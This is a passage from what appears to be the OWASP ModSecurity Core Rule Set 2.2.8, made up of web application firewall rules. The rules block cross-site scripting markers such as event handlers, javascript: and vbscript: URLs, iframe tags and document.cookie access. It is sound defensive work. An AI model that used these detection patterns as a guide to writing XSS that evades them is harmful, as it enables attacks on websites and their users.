REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bcreatetextrange\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958013',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bondragdrop\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958408',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bcopyparentfolder\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958012',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonunload\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958423',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\.execscript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958002',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bgetspecialfolder\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958017',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<body\b.*?\bonload\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958007',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\burl\b\W*?\bvbscript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958047',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonkeydown\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958410',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmousemove\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958415',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\blivescript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958022',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonblur\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958405',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmove\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958419',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bsettimeout\b\W*?\(" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958028',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\< ?iframe" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958057',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bsrc\b\W*?\bjavascript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958031',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<body\b.*?\bbackground\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958006',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bsrc\b\W*?\bvbscript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958033',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\btext\b\W*?\becmascript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958038',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonfocus\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958409',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bdocument\b\s*\.\s*\bcookie\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958001',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\<\!\[cdata\[" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958005',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonerror\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958404',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\blowsrc\b\W*?\bjavascript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958023',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bactivexobject\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958010',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonkeypress\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958411',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonsubmit\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958422',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\bapplication\b\W*?\bx-javascript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958036',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\.addimport\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958000',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 